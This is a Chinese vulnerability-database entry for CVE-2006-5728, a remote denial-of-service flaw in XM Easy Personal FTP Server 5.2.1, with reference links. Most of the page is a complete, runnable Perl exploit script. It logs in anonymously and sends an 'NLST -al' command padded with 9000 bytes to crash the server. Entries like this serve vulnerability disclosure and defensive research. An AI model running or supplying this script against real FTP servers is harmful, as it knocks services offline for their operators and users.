XM Easy Personal FTP Server 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111458 漏洞类型 资源管理错误
发布时间 2006-11-04 更新时间 2006-11-06
CVE编号 CVE-2006-5728 CNNVD-ID CNNVD-200611-108
漏洞平台 Windows CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/2715
https://www.securityfocus.com/bid/85726
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-108
|漏洞详情
XMEasyPersonalFTPServer远程认证用户通过一个传给NLST命令的长参数(可能涉及-al标记),来发起拒绝服务攻击。
|漏洞EXP
#!/usr/bin/perl
#
# *
# * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service
# * Author: boecke
# * Discovery: boecke
# * Vulnerability Type: Remote Denial of Service
# * Risk: Low Risk (Requires valid
# * Software Affected: XM Easy Personal FTP Server <= 5.2.1
# * Greetings: henrik, str0ke!
# *
#

use IO::Socket;

$commandToSend = "NLST -al ";
$remoteUsername = "anonymous";
$remotePassword = "borat\@kik.com";
$remotePort = $ARGV[1];

sub bannerExploit()
{
       print "\n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Service\n";
       print " x Author: boecke\n x Discovery: boecke (boecke [at] herzeleid [dot] net)\n\n";
}

if ( @ARGV < 2 )
{
       bannerExploit();

       print " * Usage: perl ftp.pl 192.168.0.1 21\n\n";

       exit;
}

if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => "TCP" ))
{
       bannerExploit();

       print " + Establishing connection at " . $ARGV[0] . ":" . $remotePort . "\n";

       print $socket "USER " . $remoteUsername . "\r\n";

       print " * FTP Username: \'" . $remoteUsername . "\'\n";

       sleep( 1 );

       print $socket "PASS " . $remotePassword . "\r\n";

       print " * FTP Password: \'" . $remotePassword . "\'\n";

       print $socket $commandToSend . "A" x 9000 . "\r\n";

       sleep( 3 );

       print $socket "QUIT\r\n";

       print " + Sent 9000 bytes of data to $ARGV[0]:$remotePort\n\n";
}
else
{
       bannerExploit();

       print " + Failed to establish connection to " . $ARGV[0] . ":" . $remotePort . "\n";

}

# milw0rm.com [2006-11-04]
|受影响的产品
dxmsoft XM Easy Personal FTP Server 5.2.1
|参考资料

来源:XF
名称:xm-ftp-nlst-dos(30041)
链接:http://xforce.iss.net/xforce/xfdb/30041
来源:VUPEN
名称:ADV-2006-4365
链接:http://www.frsirt.com/english/advisories/2006/4365
来源:SECUNIA
名称:22717
链接:http://secunia.com/advisories/22717
来源:MILW0RM
名称:2715
链接:http://milw0rm.com/exploits/2715